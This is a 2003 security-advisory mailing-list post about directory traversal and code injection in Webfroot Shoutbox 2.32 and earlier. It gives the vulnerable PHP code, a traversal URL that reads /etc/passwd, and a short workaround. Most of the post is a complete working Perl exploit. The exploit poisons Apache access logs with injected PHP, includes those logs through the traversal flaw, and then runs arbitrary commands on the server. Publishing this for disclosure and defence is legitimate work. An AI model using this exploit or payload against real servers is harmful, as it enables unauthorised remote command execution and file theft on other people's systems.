[UNIX] Webfroot Shoutbox Directory Traversal and Code Injection

• Previous message: SecuriTeam: "[NT] Flaw in ISAPI Extension for Windows Media Services Could Cause Denial of Service"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 30 May 2003 17:28:41 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Webfroot Shoutbox Directory Traversal and Code Injection
------------------------------------------------------------------------

SUMMARY

 <http://shoutbox.sf.net/> Webfroot Shoutbox is "PHP script released under
the GPL. Also known as a tagboard or a blabbox, shoutboxes allow visitors
to your website to leave messages to other visitors quickly and easily".
Two security vulnerabilities have been found in the product, one allows
attackers to traverse into directories that would be otherwise
inaccessible, and the other allows injecting arbitrary code into the web
site.

DETAILS

Vulnerable systems:
 * Webfroot Shoutbox version 2.32 and below

Directory traversal:
User can view any readable file on system where Webfroot Shoutbox is
running using the $conf variable.

Vulnerable code:
shoutbox.php line 43 (under verison 2.32)
-------------------------------------------------------------------
if (!isset($conf)) {
   $conf="shoutboxconf.php";
} else {
   # michel v was there
   $conf = str_replace(':', '', $conf); // hi cross-site scripting, bye
cross-site scripting
   $conf = str_replace('%3a', '', $conf); // hi cross-site scripting, bye
cross-site scripting
}

require_once ($conf);
-------------------------------------------------------------------

shoutbox.php line 43 (under verison 2.31)
-------------------------------------------------------------------
if (!isset($conf)) {
   $conf="shoutboxconf.php";
}

require_once ($conf);
--------------------------------------------------------------------

Proof of concept:
To view any readable file you can use the following URL:
http://blablabla.com/shoutbox.php?conf=../../../../../../../etc/passwd

To cause the server to execute command remotely you will need to do,
depending on the version:
For version 2.31 a user can remotely include file. For version 2.32 user
can use apache access_log to include PHP code, see exploit at the bottom.

Workaround:
Append to line 48 of shoutbox.php
$conf = str_replace('./', '', $conf); // to avoid directory traversal

Exploit:
#!/usr/bin/perl
#
# Webfroot Shoutbox < 2.32 on apache exploit
# by pokleyzz of d'scan clanz
#
# Greet:
# tynon, sk ,wanvadder, flyguy, sutan ,spoonfork, tenukboncit,
kerengge_kurus ,
# s0cket370 , b0iler and d'scan clan.
#
# Shout to:
# #vuln , #mybsd , #mylinux
#
# Just for fun :). Weekend stuff ..
#

use IO::Socket;

my $host = "127.0.0.1";
my $port = 80;
my $shoutbox = "shoutbox.php?conf=";
my $shoutboxpath = "/shoutbox";
my $cmd = "ls -l";
my $conn;
my $type;
my @logs = (
    "/etc/httpd/logs/acces_log",
    "/etc/httpd/logs/acces.log",
    "/var/www/logs/access_log",
    "/var/www/logs/access.log",
    "/usr/local/apache/logs/access_log",
    "/usr/local/apache/logs/access.log",
    "/var/log/apache/access_log",
    "/var/log/apache/access.log",
    "/var/log/httpd/access_log",
    "/var/log/httpd/access.log",
    #"D:/apps/Apache Group/Apache2/logs/access.log"
  );
  
my $qinit = "GET
/<?\$h=fopen('/tmp/.ex','w+');fwrite(\$h,'Result:<pre><?system(\$cmd);?></pre>');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n";
my $conn;

if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){
  $type = $ARGV[0];
}
else {
  print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\tby pokleyzz of
d' scan clan\n\n";
  print "Usage: \n jeritan_batinku.pl (x|r) host [command] [path]
[port]\n";
  print "\ttype\tx = exploit | r = run command (after run with x
option)\n";
  print "\thost\thostname\n";
  print "\tcommand\tcommand to execute on remote server\n";
  print "\tpath\tpath to shoutbox installation ex: /shoutbox\n";
  print "\tport\tport number\n";
  exit;
}

if ($ARGV[1]){
  $host = $ARGV[1];
}

if ($ARGV[2]){
  $cmd = $ARGV[2];
}
if ($ARGV[3]){
  $shoutboxpath = $ARGV[3];
}
if ($ARGV[4]){
  $port = int($ARGV[4]);
}

$cmd =~ s/ /+/g;

sub connect_to {
  #print "[x] Connect to $host on port $port ...\n";
  $conn = IO::Socket::INET->new (
          Proto => "tcp",
          PeerAddr => "$host",
          PeerPort => "$port",
          ) or die "[*] Can't connect to $host on port $port ...\n";
  $conn-> autoflush(1);
}

sub connect_end {
  #print "[x] Close connection\n";
  close($conn);
}

sub exploit {
  my $access_log = $_[0];
  my $result = "";
  $access_log =~ s/ /+/g;
  my $query = "GET ${shoutboxpath}/${shoutbox}${access_log}
HTTP/1.1\nHost: $host\nConnection: Close\n\n";
  print "$query";
  print "[x] Access log : ", $access_log ,"\n";
  &connect_to;
  print $conn $query;
  while ($line = <$conn>) {
    $result = $line;
    #print $result;
  };
  &connect_end;
  
}

sub run_cmd {
  my $conf="/tmp/.ex";
  #my $conf="d:/tmp/.ex";
  my $result = "";
  my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd
HTTP/1.1\nHost: $host\nConnection: Close\n\n";
  
  print "[x] Run command ...\n";
  &connect_to;
  print $conn $query;
  while ($line = <$conn>) {
    $result .= $line;
  };
  &connect_end;
  if ($result =~ /Result:/){
    print $result;
  } else {
    print $result;
    print "[*] Failed ...";
  }

}

sub insert_code {
  my $result = "";
  print "[x] Access log : ", $access_log ,"\n";
  print "[x] Insert php code into apache access log ...\n";
  &connect_to;
  print $conn "$qinit";
  while ($line = <$conn>) {
    $result .= $line;
  };
  &connect_end;
  print $result;
}

if ($type eq "x"){
  &insert_code;
  print "[x] Trying to exploit ...\n";
  for ($i = 0;$i <= $#logs; $i++){
    &exploit($logs[$i]);
  }
  &run_cmd;
} else {
  &run_cmd;
}

ADDITIONAL INFORMATION

The information has been provided by
<mailto:pokleyzz@scan-associates.net> pokleyzz.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Flaw in ISAPI Extension for Windows Media Services Could Cause Denial of Service"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]